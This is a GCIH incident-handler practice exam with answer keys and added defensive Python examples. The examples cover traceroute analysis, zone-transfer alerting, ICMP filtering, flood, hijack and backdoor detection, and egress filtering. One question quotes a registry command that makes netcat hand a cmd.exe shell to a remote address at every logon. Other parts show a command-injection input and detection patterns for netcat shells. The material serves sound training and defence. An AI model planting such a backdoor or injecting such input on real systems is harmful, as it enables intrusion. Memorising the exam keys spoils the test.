GIAC Certified Incident Handler v7.1 (GCIH)

Page:    1 / 22   
Total 328 questions

Adam works as a Security administrator for Umbrella Inc. He runs the following traceroute and notices that hops 19 and 20 both show the same IP address.
 1  172.16.1.254 (172.16.1.254)  0.724 ms  3.285 ms  0.613 ms
 2  ip68-98-176-1.nv.nv.cox.net (68.98.176.1)  12.169 ms  14.958 ms  13.416 ms
 3  ip68-98-176-1.nv.nv.cox.net (68.98.176.1)  13.948 ms  ip68-100-0-1.nv.nv.cox.net (68.100.0.1)  16.743 ms  16.207 ms
 4  ip68-100-0-137.nv.nv.cox.net (68.100.0.137)  17.324 ms  13.933 ms  20.938 ms
 5  68.1.1.4 (68.1.1.4)  12.439 ms  220.166 ms  204.170 ms
 6  so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1)  16.177 ms  25.943 ms  14.104 ms
 7  unknown.Level3.net (209.247.9.173)  14.227 ms  17.553 ms  15.415 ms
 8  so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41)  17.063 ms  20.960 ms  19.512 ms
 9  so-7-0-0.gar1.NewYork1.Level3.net (64.159.1.182)  20.334 ms  19.440 ms  17.938 ms
10  so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74)  27.526 ms  18.317 ms  21.202 ms
11  uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12)  21.411 ms  19.133 ms  18.830 ms
12  0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78)  21.203 ms  22.670 ms  20.111 ms
13  0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153)  30.929 ms  24.858 ms  23.108 ms
14  0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129)  37.894 ms  33.244 ms  33.910 ms
15  0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189)  51.165 ms  49.935 ms  49.466 ms
16  0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41)  50.937 ms  49.005 ms  51.055 ms
17  117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73)  51.897 ms  50.280 ms  53.647 ms
18  PassGuidegw1.customer.alter.net (65.195.239.14)  51.921 ms  51.571 ms  56.855 ms
19  www.PassGuide.com (65.195.239.22)  52.191 ms  52.571 ms  56.855 ms
20  www.PassGuide.com (65.195.239.22)  53.561 ms  54.121 ms  58.333 ms
Which of the following is the most likely cause of this issue?

  • A. An application firewall
  • B. Intrusion Detection System
  • C. Network Intrusion system
  • D. A stateful inspection firewall


Answer : D
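Added example, not part of the exam material: a Python parser for traceroute output with the two checks an incident handler would run over it, the repeated-address check the question describes and a check for hops that answer nothing at all. The first sample is hops 17 to 20 of the trace above; the second is a constructed trace showing the silent-hop signature. A duplicated final address points at an in-path device in front of the server (the exam's answer is a stateful inspection firewall; NAT devices and load balancers give the same picture), so confirm with a TCP trace to the service port, for example traceroute -T -p 80 on Linux, before drawing a conclusion.

```python
import re
from dataclasses import dataclass


@dataclass
class Hop:
    ttl: int
    addrs: list   # responder addresses seen at this TTL, in order of appearance
    rtts: list    # round-trip times in ms; "*" probes contribute nothing


# "<ttl>  <name> (<ip>)  1.2 ms  3.4 ms ..." or "<ttl>  * * *"
HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
RESPONDER_RE = re.compile(r"\S+\s+\((\d{1,3}(?:\.\d{1,3}){3})\)")
RTT_RE = re.compile(r"(\d+(?:\.\d+)?)\s+ms")


def parse_traceroute(text):
    """Parse Unix traceroute output into Hop records, one per TTL."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue
        ttl, rest = int(m.group(1)), m.group(2)
        hops.append(Hop(ttl=ttl,
                        addrs=RESPONDER_RE.findall(rest),
                        rtts=[float(x) for x in RTT_RE.findall(rest)]))
    return hops


def repeated_hops(hops):
    """Consecutive TTLs answered by the same address (the symptom in the question)."""
    findings = []
    for prev, cur in zip(hops, hops[1:]):
        shared = set(prev.addrs) & set(cur.addrs)
        if shared and cur.ttl == prev.ttl + 1:
            findings.append((prev.ttl, cur.ttl, sorted(shared)[0]))
    return findings


def silent_hops(hops):
    """TTLs with no responder at all: a device that drops or never sends time-exceeded."""
    return [h.ttl for h in hops if not h.addrs]


# Hops 17-20 of the trace in the question.
SAMPLE = """\
17  117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73)  51.897 ms  50.280 ms  53.647 ms
18  PassGuidegw1.customer.alter.net (65.195.239.14)  51.921 ms  51.571 ms  56.855 ms
19  www.PassGuide.com (65.195.239.22)  52.191 ms  52.571 ms  56.855 ms
20  www.PassGuide.com (65.195.239.22)  53.561 ms  54.121 ms  58.333 ms
"""

# Constructed trace: hop 2 is a filter that silently discards the expiring probes.
SAMPLE_FILTERED = """\
 1  10.0.0.1 (10.0.0.1)  0.512 ms  0.401 ms  0.398 ms
 2  * * *
 3  192.0.2.10 (192.0.2.10)  9.120 ms  8.877 ms  9.004 ms
"""

if __name__ == "__main__":
    print(repeated_hops(parse_traceroute(SAMPLE)))         # [(19, 20, '65.195.239.22')]
    print(silent_hops(parse_traceroute(SAMPLE_FILTERED)))  # [2]
```

Hop 3 of the full trace above, where two different routers answered the three probes, is why a hop keeps a list of addresses rather than a single one.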

Which of the following is a reason to implement security logging on a DNS server?

  • A. For preventing malware attacks on a DNS server
  • B. For measuring a DNS server's performance
  • C. For monitoring unauthorized zone transfer
  • D. For recording the number of queries resolved


Answer : C
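Added example, not from the exam or any DNS vendor: the monitoring the correct answer refers to, written in Python over BIND 9 style query-log lines. The log lines, the zone, the server address and the list of approved secondaries (ALLOWED_XFER_PEERS) are constructed for the example. An AXFR or IXFR query from an address that is not one of your own secondaries is either a misconfigured allow-transfer or somebody enumerating the zone.

```python
import re
from ipaddress import ip_address, ip_network

# BIND 9 query-log line shape; the "@0x..." client pointer is present in newer versions only:
#   client @0x7f1c2c0 192.0.2.10#43523 (example.com): query: example.com IN AXFR -ET (198.51.100.10)
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+"
    r"(?: \([^)]*\))?: query: (?P<name>\S+) (?P<cls>\S+) (?P<qtype>\S+)"
)

# Secondaries allowed to pull our zones (assumed addresses); everyone else asking
# for AXFR/IXFR is either a misconfiguration or reconnaissance.
ALLOWED_XFER_PEERS = [ip_network("198.51.100.20/32"), ip_network("198.51.100.21/32")]


def is_allowed_peer(ip):
    try:
        addr = ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_XFER_PEERS)


def zone_transfer_alerts(log_lines):
    """Return (client_ip, zone, qtype) for every transfer request from an unapproved source."""
    alerts = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m or m["qtype"] not in ("AXFR", "IXFR"):
            continue
        if not is_allowed_peer(m["ip"]):
            alerts.append((m["ip"], m["name"], m["qtype"]))
    return alerts


# Constructed log lines in BIND 9 query-log format (server address 198.51.100.10).
SAMPLE_LOG = [
    "12-Mar-2024 09:14:02.113 queries: info: client @0x7f1c2c0 198.51.100.20#51234 "
    "(example.com): query: example.com IN IXFR -ET (198.51.100.10)",
    "12-Mar-2024 09:14:05.771 queries: info: client @0x7f1c2c0 192.0.2.10#43523 "
    "(example.com): query: example.com IN AXFR -ET (198.51.100.10)",
    "12-Mar-2024 09:14:06.002 queries: info: client @0x7f1c2c0 192.0.2.77#60211 "
    "(example.com): query: www.example.com IN A -E(0) (198.51.100.10)",
    "12-Mar-2024 09:14:09.409 queries: info: client 203.0.113.5#1042 "
    "(example.com): query: example.com IN AXFR -T (198.51.100.10)",
]

if __name__ == "__main__":
    for ip, zone, qtype in zone_transfer_alerts(SAMPLE_LOG):
        print("ALERT: %s requested %s of %s" % (ip, qtype, zone))
```

Logging is detection, not prevention: allow-transfer (or its equivalent on other servers) should already refuse these requests, and BIND's xfer-out log category records whether a transfer was actually served, which is the line to check next when an alert fires.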

Which of the following tools can be used to perform a brute-force attack on a remote database?
Each correct answer represents a complete solution. Choose all that apply.

  • A. SQLBF
  • B. SQLDict
  • C. FindSA
  • D. nmap


Answer : A,B,C

You work as a Network Administrator for Net Perfect Inc. The company has a Windows-based network. The company wants to fix potential vulnerabilities existing on the tested systems. You use Nessus as a vulnerability scanning program to identify the vulnerabilities.
Which of the following vulnerabilities can be identified using Nessus?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Misconfiguration (e.g. open mail relay, missing patches, etc.)
  • B. Vulnerabilities that allow a remote cracker to control sensitive data on a system
  • C. Vulnerabilities that allow a remote cracker to access sensitive data on a system
  • D. Vulnerabilities that help in Code injection attacks


Answer : A,B,C

Which of the following statements are true about session hijacking?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Use of a long random number or string as the session key reduces session hijacking.
  • B. It is used to slow the working of victim's network resources.
  • C. TCP session hijacking is when a hacker takes over a TCP session between two machines.
  • D. It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.


Answer : A,C,D

Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?

  • A. Whisker
  • B. Nessus
  • C. SARA
  • D. Nmap


Answer : B

Many organizations create network maps of their network systems to visualize the network and understand the relationships between the end devices and the transport layers that provide services.
Which of the following techniques are used for network mapping by large organizations?
Each correct answer represents a complete solution. Choose three.

  • A. Packet crafting
  • B. Route analytics
  • C. SNMP-based approaches
  • D. Active Probing


Answer : B,C,D

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open, since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

  • A. Block all outgoing traffic on port 21
  • B. Block all outgoing traffic on port 53
  • C. Block ICMP type 13 messages
  • D. Block ICMP type 3 messages


Answer : C
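Added example, not part of the exam material: an ICMP message parser in Python with the perimeter decision the answer implies. hping2 lets the sender choose the ICMP type of the packets it crafts (its -C/--icmptype option), and a timestamp request is type 13; the decision function drops the reconnaissance types but keeps type 3, because destination-unreachable code 4 (fragmentation needed) is what path MTU discovery relies on, so option D would cost more than it protects. The two packets are built by the example itself; the identifier and timestamp values inside them are arbitrary.

```python
import struct

# ICMP types used below
ECHO_REPLY, DEST_UNREACHABLE, ECHO_REQUEST = 0, 3, 8
TIMESTAMP_REQUEST, TIMESTAMP_REPLY = 13, 14
ADDRESS_MASK_REQUEST, ADDRESS_MASK_REPLY = 17, 18

# Types that serve only reconnaissance from the outside; type 3 is deliberately absent,
# because code 4 (fragmentation needed) is what path MTU discovery depends on.
RECON_TYPES = {TIMESTAMP_REQUEST, TIMESTAMP_REPLY, ADDRESS_MASK_REQUEST, ADDRESS_MASK_REPLY}


def icmp_checksum(data):
    """RFC 1071 one's-complement sum over the whole ICMP message (0 means 'valid')."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type, code, rest):
    """Assemble an ICMP message with a correct checksum (used to make the test packets)."""
    body = struct.pack("!BBH", icmp_type, code, 0) + rest
    return struct.pack("!BBH", icmp_type, code, icmp_checksum(body)) + rest


def parse_icmp(raw):
    """Return (type, code, checksum_ok), or None when the message is shorter than a header."""
    if len(raw) < 8:
        return None
    icmp_type, code, _chk = struct.unpack("!BBH", raw[:4])
    return icmp_type, code, icmp_checksum(raw) == 0


def inbound_icmp_decision(raw):
    """Perimeter policy for one inbound ICMP message: 'drop' or 'allow'."""
    parsed = parse_icmp(raw)
    if parsed is None:
        return "drop"
    icmp_type, _code, ok = parsed
    if not ok or icmp_type in RECON_TYPES:
        return "drop"
    return "allow"


# Constructed packets. A timestamp request as "hping2 -C 13" would send:
# identifier, sequence, originate/receive/transmit timestamps (values arbitrary).
TS_REQUEST = build_icmp(TIMESTAMP_REQUEST, 0, struct.pack("!HHIII", 0x1234, 1, 36000000, 0, 0))
# Fragmentation-needed from a router: unused, next-hop MTU, then the offending IP header.
FRAG_NEEDED = build_icmp(DEST_UNREACHABLE, 4, struct.pack("!HH", 0, 1400) + b"\x45\x00" + b"\x00" * 26)

if __name__ == "__main__":
    print(parse_icmp(TS_REQUEST), inbound_icmp_decision(TS_REQUEST))      # (13, 0, True) drop
    print(parse_icmp(FRAG_NEEDED), inbound_icmp_decision(FRAG_NEEDED))    # (3, 4, True) allow
```

A real filter would rate-limit the types it does allow and would apply this only at the edge; inside the network, timestamp and address-mask requests are harmless and occasionally useful for troubleshooting.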

You are responsible for security at a company that uses a lot of Web applications. You are most concerned about flaws in those applications allowing some attacker to get into your network. What method would be best for finding such flaws?

  • A. Manual penetration testing
  • B. Code review
  • C. Automated penetration testing
  • D. Vulnerability scanning


Answer : D

An attacker sends a large number of packets to a target computer, causing a denial of service.
Which of the following types of attack is this?

  • A. Spoofing
  • B. Snooping
  • C. Phishing
  • D. Flooding


Answer : D
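Added example, not from the exam: the detection side of a flood in Python, a sliding-window packet-rate counter per source run over a constructed capture. The window and threshold are parameters and the values below are arbitrary.

```python
from collections import defaultdict, deque


def flooding_sources(packets, window=1.0, threshold=100):
    """Sliding-window packet-rate detector.

    packets:   iterable of (timestamp_seconds, src_ip) in arrival order
    window:    seconds of history kept per source
    threshold: packets per window above which a source is flagged
    Returns {src_ip: timestamp at which that source first crossed the threshold}.
    """
    recent = defaultdict(deque)      # src_ip -> timestamps still inside the window
    flagged = {}
    for ts, src in packets:
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()               # expire packets older than the window
        if len(q) > threshold and src not in flagged:
            flagged[src] = ts
    return flagged


def make_sample():
    """Constructed capture: one host sends 300 packets in 0.6 s, a normal client 5 per second."""
    pkts = [(10.0 + i * 0.002, "203.0.113.9") for i in range(300)]
    pkts += [(10.0 + i * 0.2, "192.0.2.50") for i in range(10)]
    return sorted(pkts)


if __name__ == "__main__":
    for src, when in flooding_sources(make_sample()).items():
        print("flood from %s, threshold crossed at t=%.3f" % (src, when))
```

A per-source threshold only works while the attacker keeps a real source address. Spoofed or distributed floods need the same counter keyed by destination address and port, with the per-source counts used afterwards to decide what to rate-limit.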

Which of the following methods can be used to detect a session hijacking attack?

  • A. nmap
  • B. Brutus
  • C. ntop
  • D. sniffer


Answer : D
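Added example, not part of the exam material: the simplest thing a sniffer (or a proxy log built from its capture) can detect about a hijacked session, in Python. Each Request is what the capture shows for one HTTP request carrying a session cookie; the records, addresses and session identifiers are constructed.

```python
from collections import namedtuple

# One HTTP request as reconstructed from a capture (or a reverse-proxy log).
Request = namedtuple("Request", "ts src_ip session_id user_agent")


def session_hijack_alerts(requests):
    """Flag session identifiers that are suddenly presented by a different client.

    A legitimate client's source address and User-Agent rarely change in the middle
    of a session; a cookie that was sniffed and replayed from another machine does.
    Returns (session_id, new_src_ip, reason) per suspicious request.
    """
    first_seen = {}     # session_id -> (src_ip, user_agent) of the first request
    alerts = []
    for r in sorted(requests, key=lambda x: x.ts):
        if r.session_id not in first_seen:
            first_seen[r.session_id] = (r.src_ip, r.user_agent)
            continue
        ip0, ua0 = first_seen[r.session_id]
        reasons = []
        if r.src_ip != ip0:
            reasons.append("ip %s -> %s" % (ip0, r.src_ip))
        if r.user_agent != ua0:
            reasons.append("user-agent changed")
        if reasons:
            alerts.append((r.session_id, r.src_ip, "; ".join(reasons)))
    return alerts


# Constructed capture: the third request replays the victim's cookie from another host.
SAMPLE = [
    Request(100.0, "192.0.2.10", "s3cr3t-abc", "Mozilla/5.0 (X11)"),
    Request(101.5, "192.0.2.10", "s3cr3t-abc", "Mozilla/5.0 (X11)"),
    Request(102.0, "198.51.100.7", "s3cr3t-abc", "curl/8.0"),
    Request(103.0, "192.0.2.11", "other-xyz", "Mozilla/5.0 (X11)"),
]

if __name__ == "__main__":
    for sid, ip, why in session_hijack_alerts(SAMPLE):
        print("session %s now used from %s: %s" % (sid, ip, why))
```

Corporate NATs and mobile clients change source addresses legitimately, so this produces leads rather than verdicts. For TCP-level hijacking the capture also shows the ACK storm between the two real endpoints once their sequence numbers have been desynchronized by the injected segments.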

Which of the following functions can you use to mitigate a command injection attack?
Each correct answer represents a part of the solution. Choose all that apply.

  • A. escapeshellarg()
  • B. escapeshellcmd()
  • C. htmlentities()
  • D. strip_tags()


Answer : A,B
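Added example, not from the exam: the same mitigation in Python rather than PHP. shlex.quote() plays the role of escapeshellarg(), turning the whole input into one shell word; the preferred fix is to validate the input and pass an argv list to subprocess.run() so no shell is involved at all. The functions return the command they would run instead of running it, so the example is safe to execute; the host names are constructed. htmlentities() and strip_tags() (options C and D) encode or strip HTML for a browser and do nothing for a shell.

```python
import re
import shlex
import subprocess

LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"^(?:%s\.)*%s$" % (LABEL, LABEL))   # also accepts dotted IPv4


def ping_command_vulnerable(host):
    """What the vulnerable code hands to the shell: input spliced into a command string."""
    return "ping -c 1 " + host        # os.system()/subprocess(shell=True) would run this


def ping_command_escaped(host):
    """shlex.quote() is Python's escapeshellarg(): the input becomes a single shell word."""
    return "ping -c 1 " + shlex.quote(host)


def ping_argv_hardened(host):
    """Preferred fix: validate, then build argv and run it with no shell at all."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("not a valid hostname: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host):
    """How the hardened argv is meant to be used (not called by the demo below)."""
    return subprocess.run(ping_argv_hardened(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    evil = "8.8.8.8; id"                      # constructed attacker input
    print(ping_command_vulnerable(evil))      # ping -c 1 8.8.8.8; id    -> the shell runs "id"
    print(ping_command_escaped(evil))         # ping -c 1 '8.8.8.8; id'  -> one bogus hostname
    try:
        ping_argv_hardened(evil)
    except ValueError as e:
        print("rejected:", e)
```

Escaping alone still allows option injection: an input of -f or --flood is a perfectly valid quoted argument and ping will happily treat it as a flag. That is why the hardened version rejects anything that is not a hostname before building argv, rather than relying on quoting.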

You run the following command on a remote Windows Server 2003 computer:
c:\> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to perform banner grabbing.
  • B. You want Netcat to execute every time a user logs on.
  • C. You want to put Netcat in the stealth mode.
  • D. You want to add the Netcat command to the Windows registry.


Answer : B,C,D
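Added example, not from the exam: the detection counterpart of the command above, in Python. It parses the output of reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run (the sample output is constructed in that tool's format) and flags autorun values that look like a backdoor: a netcat binary, a shell handed to a socket with -e, or a program launched from a temp or public directory. The Run key makes the value start at every logon, -d detaches netcat from the console, and -e cmd.exe is what gives the remote end a shell.

```python
import re

# One value line from "reg query" output: 4-space indent, then name, type and data,
# separated by four spaces.
VALUE_RE = re.compile(r"^ {4}(?P<name>\S.*?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")

# (pattern applied to the value data, reason); extend with your own indicators.
SUSPICIOUS = [
    (re.compile(r"\bnc(?:at)?(?:\.exe)?\b", re.I), "netcat binary"),
    (re.compile(r"\s-e\s+(?:cmd|powershell)(?:\.exe)?\b", re.I), "shell handed to the socket (-e)"),
    (re.compile(r"\\(?:temp|users\\public|appdata\\local\\temp)\\", re.I), "runs from a temp/public directory"),
]


def parse_run_key(reg_output):
    """Return [(name, type, data)] for each value printed by reg query."""
    values = []
    for line in reg_output.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values.append((m["name"], m["type"], m["data"].strip()))
    return values


def suspicious_run_entries(reg_output):
    """Autorun values whose command line looks like a backdoor, with the reasons."""
    findings = []
    for name, _vtype, data in parse_run_key(reg_output):
        reasons = [why for pat, why in SUSPICIOUS if pat.search(data)]
        if reasons:
            findings.append((name, data, reasons))
    return findings


# Constructed "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" output,
# containing the value the command in the question creates.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe
    Updater    REG_SZ    C:\Users\Public\svchost.exe
"""

if __name__ == "__main__":
    for name, data, reasons in suspicious_run_entries(SAMPLE):
        print("%s = %s\n    %s" % (name, data, ", ".join(reasons)))
```

On a live host also query HKCU\Software\Microsoft\Windows\CurrentVersion\Run, the RunOnce keys and, on 64-bit Windows, the Wow6432Node path; the output format is the same, so the parser applies unchanged.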

Which of the following incident handling process phases is responsible for defining rules, organizing the human workforce, creating a backup plan, and testing the plans for an enterprise?

  • A. Preparation phase
  • B. Eradication phase
  • C. Identification phase
  • D. Recovery phase
  • E. Containment phase


Answer : A

Fill in the blank with the appropriate term.
_______ is the practice of monitoring and potentially restricting the flow of information outbound from one network to another.


Answer : Egress filtering
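Added example, not from the exam: an egress policy evaluated in Python against a few constructed flows, to show what the definition means in practice. The internal address space, the resolver address and the rules are assumptions made for the example. Two details carry most of the value: the default is deny, and DNS is permitted only to the organization's own resolver, which is what closes the reverse-shell and DNS-tunnelling paths that inbound-only firewall rules never see.

```python
from ipaddress import ip_address, ip_network

# Assumed internal address space and internal resolver for this example.
INTERNAL = ip_network("10.0.0.0/8")
RESOLVER = ip_network("10.0.0.53/32")

# Ordered egress rules: (action, protocol, destination network, allowed destination
# ports or None for any). First match wins; the last rule is the default deny.
EGRESS_RULES = [
    ("allow", "udp", RESOLVER, {53}),                       # DNS only to our own resolver
    ("allow", "tcp", RESOLVER, {53}),
    ("allow", "tcp", ip_network("0.0.0.0/0"), {80, 443}),   # web (better: only via a proxy)
    ("allow", "any", INTERNAL, None),                       # internal to internal
    ("deny",  "any", ip_network("0.0.0.0/0"), None),        # everything else
]


def egress_decision(src, dst, proto, dport):
    """Decide whether a flow leaving the internal network is allowed out."""
    s, d = ip_address(src), ip_address(dst)
    if s not in INTERNAL:
        return "deny"     # anti-spoofing (BCP 38): our edge never emits foreign source addresses
    for action, rproto, net, ports in EGRESS_RULES:
        if rproto != "any" and rproto != proto:
            continue
        if d not in net:
            continue
        if ports is not None and dport not in ports:
            continue
        return action
    return "deny"


# Constructed flows: (src, dst, proto, dport)
FLOWS = [
    ("10.0.5.20", "203.0.113.9", "tcp", 4444),    # reverse shell to an Internet listener
    ("10.0.5.20", "8.8.8.8", "udp", 53),          # DNS to an outside resolver (tunnelling path)
    ("10.0.5.20", "10.0.0.53", "udp", 53),        # DNS to our resolver
    ("10.0.5.20", "203.0.113.10", "tcp", 443),    # HTTPS out
    ("10.0.5.20", "10.0.8.8", "tcp", 445),        # SMB to another internal host
    ("172.16.9.9", "203.0.113.10", "tcp", 443),   # spoofed or foreign source leaving our edge
]

if __name__ == "__main__":
    for flow in FLOWS:
        print(flow, "->", egress_decision(*flow))
```

The first flow is the Netcat reverse shell from the earlier registry question pointed at an Internet address: it is refused although no inbound rule mentions port 4444, which is exactly the case egress filtering exists for.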
